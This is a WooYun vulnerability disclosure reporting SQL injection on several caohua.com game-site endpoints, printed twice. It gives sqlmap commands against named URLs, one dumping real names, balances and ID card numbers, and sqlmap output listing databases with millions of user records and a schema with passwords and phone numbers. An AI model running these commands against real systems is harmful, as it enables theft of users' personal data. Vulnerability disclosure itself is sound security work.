当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0184694

漏洞标题:游戏安全之某手游网SQL注入打包可垮裤查询(涉及百万用户信息)

相关厂商:caohua.com

漏洞作者: 黑色键盘丶

提交时间:2016-04-09 13:33

修复时间:2016-05-24 14:30

公开时间:2016-05-24 14:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-09: 细节已通知厂商并且等待厂商处理中
2016-04-09: 厂商已经确认,细节仅向厂商公开
2016-04-19: 细节向核心白帽子及相关领域专家公开
2016-04-29: 细节向普通白帽子公开
2016-05-09: 细节向实习白帽子公开
2016-05-24: 细节向公众公开

简要描述:

RT

详细说明:

分站POST注入:E:\sqlmap>sqlmap.py -u "http://cms.caohua.com/Member/Register.aspx" --data "__ha
sh__=QZKMhJ1pv8RhKGxQvSBk9RWXBes%2Bi23q%2FWF3%2BODYAlA%3D&__action__=jvXQDpVsgMF
rewgNVdPG1X5DJ2nGcGtHt5dvuyNhp6s%3D&txtLoginPass=88952634&txtLoginPass_2=8895263
4&txtQQ=88952634&txtCheckNum=88952634&txtUserName=88952634" -D MobPlatform -T Da
ta_UserAccount -C "RealName,CountMoney,IDCard" --dump


----------------------------------

主站POST注入:E:\sqlmap>sqlmap.py -u "http://www.caohua.com/game.html" --data "content=8895263
4" --current-db


----------------------------

主站POST注入:E:\sqlmap>sqlmap.py -u "http://www.caohua.com/soulb" --data "packcent=88952634"
--dbs


-------------------------------

E:\sqlmap>sqlmap.py -u "http://admin.caohua.com/Web/Member/Member.ashx?m=isRepea
t&UserName=" --dbs


------------------------------

E:\sqlmap>sqlmap.py -u "http://activity.caohua.com/MarchSKAjax/AjaxIndex.ashx?m=
GetQuery&uid=1" --dbs


-----------------------------

E:\sqlmap>sqlmap.py -u "http://wap.caohua.com/Web/Game/GameList/BSearchGame.ashx
?Content=" --dbs


10个裤 都可以查询

XJS2CEXUIML`{@C7}[%L0(2.png


数据库:MobPlatform

Database: MobPlatform
+----------------------------------+---------+
| Table                            | Entries |
+----------------------------------+---------+
| dbo.Data_ProDownLoad             | 6415950 |
| dbo.Data_CallBackError           | 6067433 |
| dbo.Data_ProCPA                  | 5775310 |
| dbo.Data_ProductUsers            | 5586541 |
| dbo.ExtData_SourcePlanTotalCount | 1663380 |
| dbo.Data_UserAccount             | 1388708 |
| dbo.ExtData_UserPlanTotalCount   | 1333119 |
| dbo.Data_ProductOrder            | 1230833 |
| dbo.Data_ProCPS                  | 1151720 |
| dbo.Data_ProductGift             | 1107720 |
| dbo.ExtData_SourceTotalCount     | 1070893 |
| dbo.Data_SourcePlanTotalCount    | 976886  |
| dbo.Data_ProLogin                | 840158  |
| dbo.Data_UserPlanTotalCount      | 654747  |
| dbo.ExtData_PlanTotalCount       | 587222  |
| dbo.ExtData_ProductTotalCount    | 485816  |
| dbo.Data_PlanTotalCount          | 323250  |
| dbo.Data_SourceTotalCount        | 145167  |
| dbo.Data_UserTotalCount          | 84706   |
| dbo.Base_SourceAPKInfo           | 52370   |
| dbo.Data_UserPayOrder            | 33938   |
| dbo.Data_ProductTotalCount       | 26426   |
| dbo.Base_Server                  | 18644   |
| dbo.Base_UserAdvertPlan          | 14106   |
| dbo.Data_GiftCheck               | 10178   |
| dbo.Data_SourceMoneyToMember     | 9592    |
| dbo.Data_UserBillRecords         | 6312    |
| dbo.Base_SourceAdvertPlan        | 5660    |
| dbo.MS_Menu_Role                 | 3902    |
| dbo.Data_UserSecret              | 3583    |
| dbo.PS_SiteData                  | 3523    |
| dbo.Base_DrawOrders              | 3448    |
| dbo.Base_UserSource              | 2614    |
| dbo.Base_UserAccount             | 2232    |
| dbo.Base_UserInfo                | 2214    |
| dbo.Base_UserPersonal            | 1162    |
| dbo.Data_MSDKPayOrders           | 1118    |
| dbo.Base_UserBankInfo            | 1044    |
| dbo.Base_ProductGift             | 513     |
| dbo.Base_SourceHtml              | 469     |
| dbo.Base_UserCompany             | 382     |
| dbo.PS_Mixed                     | 309     |
| dbo.Base_AdvertPlan              | 227     |
| dbo.MSreplication_objects        | 219     |
| dbo.Data_SourceChargeApply       | 175     |
| dbo.Base_ProductInfo             | 169     |
| dbo.MS_Manager_Role              | 89      |
| dbo.MS_Manager_Role              | 89      |
| dbo.BBS_Topic                    | 57      |
| dbo.PS_ArticleClass              | 53      |
| dbo.PS_ArticleClass              | 53      |
| dbo.MS_Role                      | 48      |
| dbo.Data_UserMoneyInsertPost     | 44      |
| dbo.PS_AdsClass                  | 23      |
| dbo.PS_AdsClass                  | 23      |
| dbo.MS_Dept                      | 18      |
| dbo.PS_Payment                   | 16      |
| dbo.Base_Corner                  | 14      |
| dbo.Base_ProductArticle          | 7       |
| dbo.SDK_Class                    | 5       |
| dbo.Base_PackServer              | 4       |
| dbo.Data_ArticleClass            | 2       |
| dbo.Data_ProductInfo             | 2       |
| dbo.CN_Menu                      | 1       |
| dbo.MS_Config                    | 1       |
| dbo.MSreplication_subscriptions  | 1       |
| dbo.MSsubscription_agents        | 1       |
+----------------------------------+---------+


数据库:MobUsers_DB

Database: MobUsers_DB
+----------------------+---------+
| Table                | Entries |
+----------------------+---------+
| dbo.Data_UserAccount | 5701357 |
+----------------------+---------+


数据库:MobGame_DB

Database: MobGame_DB
+---------------------------------+---------+
| Table                           | Entries |
+---------------------------------+---------+
| dbo.Re_OldUser                  | 4916892 |
| dbo.Ur_WalletLog                | 2647587 |
| dbo.Ur_DoWork                   | 1610735 |
| dbo.SC_GetLog                   | 1497556 |
| dbo.SC_TaskLog                  | 1497556 |
| dbo.Us_Info                     | 1374572 |
| dbo.Ge_GiftCode                 | 1002609 |
| dbo.Ge_GiftCode                 | 1002609 |
| dbo.Data_CallBackError          | 632818  |
| dbo.AC_Player                   | 316155  |
| dbo.CH_SignLog                  | 243104  |
| dbo.AC_FinshRole                | 236807  |
| dbo.Or_PayOrder                 | 182786  |
| dbo.Or_GameOrder                | 161090  |
| dbo.CH_RewardLog                | 52355   |
| dbo.SG_SignLog                  | 49922   |
| dbo.HP_Integral                 | 38682   |
| dbo.CH_Player                   | 32054   |
| dbo.NY_SignLog                  | 30008   |
| dbo.SI_Info                     | 27695   |
| dbo.HP_ISDonate                 | 26467   |
| dbo.CH_GetLog                   | 23399   |
| dbo.SG_GetLog                   | 22206   |
| dbo.HL_GetLog                   | 19799   |
| dbo.HL_DrawLog                  | 19014   |
| dbo.CH_Order                    | 15963   |
| dbo.NY_Blessing                 | 13916   |
| dbo.SI_Player                   | 13011   |
| dbo.SK_GrabLog                  | 12175   |
| dbo.SI_GiftLog                  | 10525   |
| dbo.NY_Player                   | 9888    |
| dbo.SG_Player                   | 9452    |
| dbo.RP_GetLog                   | 8559    |
| dbo.AC_Receive                  | 7889    |
| dbo.AC_Rotary                   | 7889    |
| dbo.RP_Player                   | 5868    |
| dbo.SK_GetLog                   | 5501    |
| dbo.NY_PayOrder                 | 4339    |
| dbo.SK_Player                   | 3954    |
| dbo.PS_SiteData                 | 3523    |
| dbo.Us_Wallet                   | 3511    |
| dbo.MK_Order                    | 3246    |
| dbo.HL_Player                   | 2916    |
| dbo.Re_Order                    | 2681    |
| dbo.SI_UserRole                 | 2550    |
| dbo.NY_ClockLog                 | 2089    |
| dbo.RP_Order                    | 1933    |
| dbo.MS_Menu_Role                | 1915    |
| dbo.MK_GetLog                   | 1854    |
| dbo.HL_ExchangeGiftCode         | 1804    |
| dbo.HL_ExchangeGiftCode         | 1804    |
| dbo.MK_Player                   | 988     |
| dbo.MSreplication_objects       | 303     |
| dbo.Ge_Info                     | 119     |
| dbo.SK_Gift                     | 96      |
| dbo.Ur_Work                     | 92      |
| dbo.PM_Order                    | 71      |
| dbo.MS_Manager_Role             | 42      |
| dbo.MS_Manager_Role             | 42      |
| dbo.SC_PlayerPlace              | 34      |
| dbo.SC_PlayerPlace              | 34      |
| dbo.PS_ArticleClass             | 22      |
| dbo.PS_ArticleClass             | 22      |
| dbo.PS_AdsClass                 | 19      |
| dbo.PS_AdsClass                 | 19      |
| dbo.PS_Mixed                    | 18      |
| dbo.AC_Prize                    | 17      |
| dbo.SG_Gift                     | 15      |
| dbo.SK_TimeField                | 15      |
| dbo.HL_Gift                     | 13      |
| dbo.MS_Role                     | 12      |
| dbo.SC_Scratch                  | 11      |
| dbo.AC_Gift                     | 10      |
| dbo.CH_Gift                     | 10      |
| dbo.MR_Rank                     | 10      |
| dbo.PS_Payment                  | 10      |
| dbo.SI_Gitf                     | 10      |
| dbo.MK_Rebate                   | 8       |
| dbo.RP_Gift                     | 8       |
| dbo.SC_Gift                     | 8       |
| dbo.System_Configs              | 8       |
| dbo.MS_Dept                     | 7       |
| dbo.NY_Gift                     | 7       |
| dbo.PM_Product                  | 5       |
| dbo.Ms_Config                   | 4       |
| dbo.Re_Info                     | 4       |
| dbo.SK_Seckill                  | 4       |
| dbo.Data_Discount               | 3       |
| dbo.AC_Role                     | 2       |
| dbo.HL_Turntable                | 2       |
| dbo.RP_TimeField                | 2       |
| dbo.SG_Role                     | 2       |
| dbo.CH_Role                     | 1       |
| dbo.HP_Donate                   | 1       |
| dbo.MK_Role                     | 1       |
| dbo.MSreplication_subscriptions | 1       |
| dbo.MSsubscription_agents       | 1       |
| dbo.NY_NewYear                  | 1       |
| dbo.RP_RedPackets               | 1       |
| dbo.SI_Role                     | 1       |
+---------------------------------+---------+


这个裤还有可以整出论坛的

Database: MobGame_DB
Table: Us_Info
[19 columns]
+----------------+----------+
| Column         | Type     |
+----------------+----------+
| Active         | int      |
| AddDateTime    | datetime |
| BBSPwd         | varchar  |
| Birthday       | datetime |
| Email          | varchar  |
| GiveMoney      | decimal  |
| IDCard         | varchar  |
| Install        | int      |
| LoginName      | varchar  |
| NickName       | varchar  |
| Password       | varchar  |
| Pay            | decimal  |
| QQ             | varchar  |
| Rank_ID        | int      |
| RealName       | varchar  |
| Status         | char     |
| Tel            | varchar  |
| Token          | varchar  |
| UpdateDateTime | datetime |
+----------------+----------+


跑了几个数据量大的 还有几个就不一一演示了

漏洞证明:

分站POST注入:E:\sqlmap>sqlmap.py -u "http://cms.caohua.com/Member/Register.aspx" --data "__ha
sh__=QZKMhJ1pv8RhKGxQvSBk9RWXBes%2Bi23q%2FWF3%2BODYAlA%3D&__action__=jvXQDpVsgMF
rewgNVdPG1X5DJ2nGcGtHt5dvuyNhp6s%3D&txtLoginPass=88952634&txtLoginPass_2=8895263
4&txtQQ=88952634&txtCheckNum=88952634&txtUserName=88952634" -D MobPlatform -T Da
ta_UserAccount -C "RealName,CountMoney,IDCard" --dump


----------------------------------

主站POST注入:E:\sqlmap>sqlmap.py -u "http://www.caohua.com/game.html" --data "content=8895263
4" --current-db


----------------------------

主站POST注入:E:\sqlmap>sqlmap.py -u "http://www.caohua.com/soulb" --data "packcent=88952634"
--dbs


-------------------------------

E:\sqlmap>sqlmap.py -u "http://admin.caohua.com/Web/Member/Member.ashx?m=isRepea
t&UserName=" --dbs


------------------------------

E:\sqlmap>sqlmap.py -u "http://activity.caohua.com/MarchSKAjax/AjaxIndex.ashx?m=
GetQuery&uid=1" --dbs


-----------------------------

E:\sqlmap>sqlmap.py -u "http://wap.caohua.com/Web/Game/GameList/BSearchGame.ashx
?Content=" --dbs


10个裤 都可以查询

XJS2CEXUIML`{@C7}[%L0(2.png


数据库:MobPlatform

Database: MobPlatform
+----------------------------------+---------+
| Table                            | Entries |
+----------------------------------+---------+
| dbo.Data_ProDownLoad             | 6415950 |
| dbo.Data_CallBackError           | 6067433 |
| dbo.Data_ProCPA                  | 5775310 |
| dbo.Data_ProductUsers            | 5586541 |
| dbo.ExtData_SourcePlanTotalCount | 1663380 |
| dbo.Data_UserAccount             | 1388708 |
| dbo.ExtData_UserPlanTotalCount   | 1333119 |
| dbo.Data_ProductOrder            | 1230833 |
| dbo.Data_ProCPS                  | 1151720 |
| dbo.Data_ProductGift             | 1107720 |
| dbo.ExtData_SourceTotalCount     | 1070893 |
| dbo.Data_SourcePlanTotalCount    | 976886  |
| dbo.Data_ProLogin                | 840158  |
| dbo.Data_UserPlanTotalCount      | 654747  |
| dbo.ExtData_PlanTotalCount       | 587222  |
| dbo.ExtData_ProductTotalCount    | 485816  |
| dbo.Data_PlanTotalCount          | 323250  |
| dbo.Data_SourceTotalCount        | 145167  |
| dbo.Data_UserTotalCount          | 84706   |
| dbo.Base_SourceAPKInfo           | 52370   |
| dbo.Data_UserPayOrder            | 33938   |
| dbo.Data_ProductTotalCount       | 26426   |
| dbo.Base_Server                  | 18644   |
| dbo.Base_UserAdvertPlan          | 14106   |
| dbo.Data_GiftCheck               | 10178   |
| dbo.Data_SourceMoneyToMember     | 9592    |
| dbo.Data_UserBillRecords         | 6312    |
| dbo.Base_SourceAdvertPlan        | 5660    |
| dbo.MS_Menu_Role                 | 3902    |
| dbo.Data_UserSecret              | 3583    |
| dbo.PS_SiteData                  | 3523    |
| dbo.Base_DrawOrders              | 3448    |
| dbo.Base_UserSource              | 2614    |
| dbo.Base_UserAccount             | 2232    |
| dbo.Base_UserInfo                | 2214    |
| dbo.Base_UserPersonal            | 1162    |
| dbo.Data_MSDKPayOrders           | 1118    |
| dbo.Base_UserBankInfo            | 1044    |
| dbo.Base_ProductGift             | 513     |
| dbo.Base_SourceHtml              | 469     |
| dbo.Base_UserCompany             | 382     |
| dbo.PS_Mixed                     | 309     |
| dbo.Base_AdvertPlan              | 227     |
| dbo.MSreplication_objects        | 219     |
| dbo.Data_SourceChargeApply       | 175     |
| dbo.Base_ProductInfo             | 169     |
| dbo.MS_Manager_Role              | 89      |
| dbo.MS_Manager_Role              | 89      |
| dbo.BBS_Topic                    | 57      |
| dbo.PS_ArticleClass              | 53      |
| dbo.PS_ArticleClass              | 53      |
| dbo.MS_Role                      | 48      |
| dbo.Data_UserMoneyInsertPost     | 44      |
| dbo.PS_AdsClass                  | 23      |
| dbo.PS_AdsClass                  | 23      |
| dbo.MS_Dept                      | 18      |
| dbo.PS_Payment                   | 16      |
| dbo.Base_Corner                  | 14      |
| dbo.Base_ProductArticle          | 7       |
| dbo.SDK_Class                    | 5       |
| dbo.Base_PackServer              | 4       |
| dbo.Data_ArticleClass            | 2       |
| dbo.Data_ProductInfo             | 2       |
| dbo.CN_Menu                      | 1       |
| dbo.MS_Config                    | 1       |
| dbo.MSreplication_subscriptions  | 1       |
| dbo.MSsubscription_agents        | 1       |
+----------------------------------+---------+


数据库:MobUsers_DB

Database: MobUsers_DB
+----------------------+---------+
| Table                | Entries |
+----------------------+---------+
| dbo.Data_UserAccount | 5701357 |
+----------------------+---------+


数据库:MobGame_DB

Database: MobGame_DB
+---------------------------------+---------+
| Table                           | Entries |
+---------------------------------+---------+
| dbo.Re_OldUser                  | 4916892 |
| dbo.Ur_WalletLog                | 2647587 |
| dbo.Ur_DoWork                   | 1610735 |
| dbo.SC_GetLog                   | 1497556 |
| dbo.SC_TaskLog                  | 1497556 |
| dbo.Us_Info                     | 1374572 |
| dbo.Ge_GiftCode                 | 1002609 |
| dbo.Ge_GiftCode                 | 1002609 |
| dbo.Data_CallBackError          | 632818  |
| dbo.AC_Player                   | 316155  |
| dbo.CH_SignLog                  | 243104  |
| dbo.AC_FinshRole                | 236807  |
| dbo.Or_PayOrder                 | 182786  |
| dbo.Or_GameOrder                | 161090  |
| dbo.CH_RewardLog                | 52355   |
| dbo.SG_SignLog                  | 49922   |
| dbo.HP_Integral                 | 38682   |
| dbo.CH_Player                   | 32054   |
| dbo.NY_SignLog                  | 30008   |
| dbo.SI_Info                     | 27695   |
| dbo.HP_ISDonate                 | 26467   |
| dbo.CH_GetLog                   | 23399   |
| dbo.SG_GetLog                   | 22206   |
| dbo.HL_GetLog                   | 19799   |
| dbo.HL_DrawLog                  | 19014   |
| dbo.CH_Order                    | 15963   |
| dbo.NY_Blessing                 | 13916   |
| dbo.SI_Player                   | 13011   |
| dbo.SK_GrabLog                  | 12175   |
| dbo.SI_GiftLog                  | 10525   |
| dbo.NY_Player                   | 9888    |
| dbo.SG_Player                   | 9452    |
| dbo.RP_GetLog                   | 8559    |
| dbo.AC_Receive                  | 7889    |
| dbo.AC_Rotary                   | 7889    |
| dbo.RP_Player                   | 5868    |
| dbo.SK_GetLog                   | 5501    |
| dbo.NY_PayOrder                 | 4339    |
| dbo.SK_Player                   | 3954    |
| dbo.PS_SiteData                 | 3523    |
| dbo.Us_Wallet                   | 3511    |
| dbo.MK_Order                    | 3246    |
| dbo.HL_Player                   | 2916    |
| dbo.Re_Order                    | 2681    |
| dbo.SI_UserRole                 | 2550    |
| dbo.NY_ClockLog                 | 2089    |
| dbo.RP_Order                    | 1933    |
| dbo.MS_Menu_Role                | 1915    |
| dbo.MK_GetLog                   | 1854    |
| dbo.HL_ExchangeGiftCode         | 1804    |
| dbo.HL_ExchangeGiftCode         | 1804    |
| dbo.MK_Player                   | 988     |
| dbo.MSreplication_objects       | 303     |
| dbo.Ge_Info                     | 119     |
| dbo.SK_Gift                     | 96      |
| dbo.Ur_Work                     | 92      |
| dbo.PM_Order                    | 71      |
| dbo.MS_Manager_Role             | 42      |
| dbo.MS_Manager_Role             | 42      |
| dbo.SC_PlayerPlace              | 34      |
| dbo.SC_PlayerPlace              | 34      |
| dbo.PS_ArticleClass             | 22      |
| dbo.PS_ArticleClass             | 22      |
| dbo.PS_AdsClass                 | 19      |
| dbo.PS_AdsClass                 | 19      |
| dbo.PS_Mixed                    | 18      |
| dbo.AC_Prize                    | 17      |
| dbo.SG_Gift                     | 15      |
| dbo.SK_TimeField                | 15      |
| dbo.HL_Gift                     | 13      |
| dbo.MS_Role                     | 12      |
| dbo.SC_Scratch                  | 11      |
| dbo.AC_Gift                     | 10      |
| dbo.CH_Gift                     | 10      |
| dbo.MR_Rank                     | 10      |
| dbo.PS_Payment                  | 10      |
| dbo.SI_Gitf                     | 10      |
| dbo.MK_Rebate                   | 8       |
| dbo.RP_Gift                     | 8       |
| dbo.SC_Gift                     | 8       |
| dbo.System_Configs              | 8       |
| dbo.MS_Dept                     | 7       |
| dbo.NY_Gift                     | 7       |
| dbo.PM_Product                  | 5       |
| dbo.Ms_Config                   | 4       |
| dbo.Re_Info                     | 4       |
| dbo.SK_Seckill                  | 4       |
| dbo.Data_Discount               | 3       |
| dbo.AC_Role                     | 2       |
| dbo.HL_Turntable                | 2       |
| dbo.RP_TimeField                | 2       |
| dbo.SG_Role                     | 2       |
| dbo.CH_Role                     | 1       |
| dbo.HP_Donate                   | 1       |
| dbo.MK_Role                     | 1       |
| dbo.MSreplication_subscriptions | 1       |
| dbo.MSsubscription_agents       | 1       |
| dbo.NY_NewYear                  | 1       |
| dbo.RP_RedPackets               | 1       |
| dbo.SI_Role                     | 1       |
+---------------------------------+---------+


这个裤还有可以整出论坛的

Database: MobGame_DB
Table: Us_Info
[19 columns]
+----------------+----------+
| Column         | Type     |
+----------------+----------+
| Active         | int      |
| AddDateTime    | datetime |
| BBSPwd         | varchar  |
| Birthday       | datetime |
| Email          | varchar  |
| GiveMoney      | decimal  |
| IDCard         | varchar  |
| Install        | int      |
| LoginName      | varchar  |
| NickName       | varchar  |
| Password       | varchar  |
| Pay            | decimal  |
| QQ             | varchar  |
| Rank_ID        | int      |
| RealName       | varchar  |
| Status         | char     |
| Tel            | varchar  |
| Token          | varchar  |
| UpdateDateTime | datetime |
+----------------+----------+


跑了几个数据量大的 还有几个就不一一演示了

修复方案:

你懂的

版权声明:转载请注明来源 黑色键盘丶@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-04-09 14:20

厂商回复:

数据库可跨库查询,信息泄露

最新状态:

2016-05-06:已修复